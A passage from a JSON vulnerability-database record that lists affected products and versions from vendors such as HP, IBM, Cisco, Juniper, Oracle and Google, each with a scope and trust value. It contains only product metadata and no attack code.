        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "storeever msl6480 tape library",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.40"
      },
      {
        "model": "msr3000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "video surveillance series ip camera",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40000"
      },
      {
        "model": "tivoli endpoint manager for remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.0"
      },
      {
        "model": "color laserjet enterprise m750 d3l09a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for desktop platforms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos space 13.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.013"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.3"
      },
      {
        "model": "laserjet enterprise color m855 a2w79a 2302963 436076",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.67"
      },
      {
        "model": "filenet system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "spa510 series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "operations automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "5.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.20"
      },
      {
        "model": "4800g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos 12.1x44-d34",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "flex system p460",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-43x)0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.7"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.4"
      },
      {
        "model": "idp 4.1r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.00"
      },
      {
        "model": "storevirtual vsa software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.5"
      },
      {
        "model": "storevirtual 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "tivoli endpoint manager for remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "usg9500 v200r001c01sph902",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "data ontap smi-s agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce503a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.11"
      },
      {
        "model": "sylpheed",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "3.4.2"
      },
      {
        "model": "host checker",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.3"
      },
      {
        "model": "junos space ja2500 appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "enterprise linux server eus 6.5.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.0"
      },
      {
        "model": "laserjet m5035 multifunction printer q7831a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "prime performance manager for sps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "receiver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "storevirtual 4tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "clustered data ontap antivirus connector",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.12"
      },
      {
        "model": "secure work space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "0"
      },
      {
        "model": "color laserjet cp6015 q3935a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "s7700\u0026s9700 v200r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "wide area application services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87100"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.2"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb482a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "sterling file gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "s3900 v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.0.3"
      },
      {
        "model": "collaboration services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "unified communications widgets click to call",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "color laserjet cp6015 q3933a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "softco v100r003",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.6"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "telepresence t series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "unified attendant console advanced",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "idol software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.7"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "9.0.3"
      },
      {
        "model": "puredata system for hadoop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.02"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.3"
      },
      {
        "model": "ftp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cerberus",
        "version": "7.0.0.1"
      },
      {
        "model": "proventia network security controller 1.0.3352m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "idatplex dx360 m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79130"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v310.1"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10000"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.4"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1"
      },
      {
        "model": "fastsetup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "flare experience for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32100"
      },
      {
        "model": "laserjet printer series q5409a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43508.250.2"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g85a 2303714 233000041",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.0"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1.5-3"
      },
      {
        "model": "color laserjet multifunction printer series cb483a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "jabber for ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "dgs-1500-28p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "2.51.005"
      },
      {
        "model": "security information and event management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.4"
      },
      {
        "model": "project openssl 0.9.8n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos 11.4r12",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.1.1"
      },
      {
        "model": "a6600 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.5.1"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1"
      },
      {
        "model": "laserjet multifunction printer series q3728a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.290.2"
      },
      {
        "model": "junos space 12.3r2.8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system x3650m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79451.42"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.36"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "color laserjet cp6015 q3932a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "operations analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "bcaaa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "vcloud networking and security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1.2"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.2.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "vsphere support assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "endpoint manager for remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "manageone v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.7"
      },
      {
        "model": "laserjet m4345 multifunction printer cb426a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "storevirtual 1tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "tivoli netcool/system service monitor fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.34"
      },
      {
        "model": "s7700\u0026s9700 v100r006",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.19"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "s6900 v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "14.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.1"
      },
      {
        "model": "ucs b-series servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.7.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.16"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.011"
      },
      {
        "model": "junos r7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.29"
      },
      {
        "model": "storeever msl6480 tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "junos os 11.4r12-s1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.2"
      },
      {
        "model": "3par service processor sp-4.3.0.ga-17.p001",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "laserjet printer series q5407a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43508.250.2"
      },
      {
        "model": "laserjet enterprise color mfp m880 a2w76a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.28"
      },
      {
        "model": "storevirtual hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.6"
      },
      {
        "model": "laserjet enterprise color m775 series cc524a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "universal small cell series software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50003.4.2.0"
      },
      {
        "model": "laserjet p4515 cb515a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cloudburst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "junos 12.1r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "junos 11.4r10-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "junos 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "cit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.73"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "junos 12.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.11"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.1"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.015"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.09"
      },
      {
        "model": "sbr carrier 8.0.0-r2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "documentum content server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.1"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "storevirtual 4tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77109.7"
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cf399a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "color laserjet cp3525 cc469a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.183.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.1"
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "quantum policy suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet enterprise color m775 series cc522a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "msr20 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "forticlient",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0.614"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "asset manager 9.41.p1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "cloudsystem enterprise software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0.2"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.6"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "model": "msr1000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.3"
      },
      {
        "model": "9.2-rc2-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "utm manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "tivoli netcool/system service monitor fp10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3"
      },
      {
        "model": "cloud server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.16"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "system x3630m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73771.42"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "10.0.2"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.22"
      },
      {
        "model": "fortirecorder",
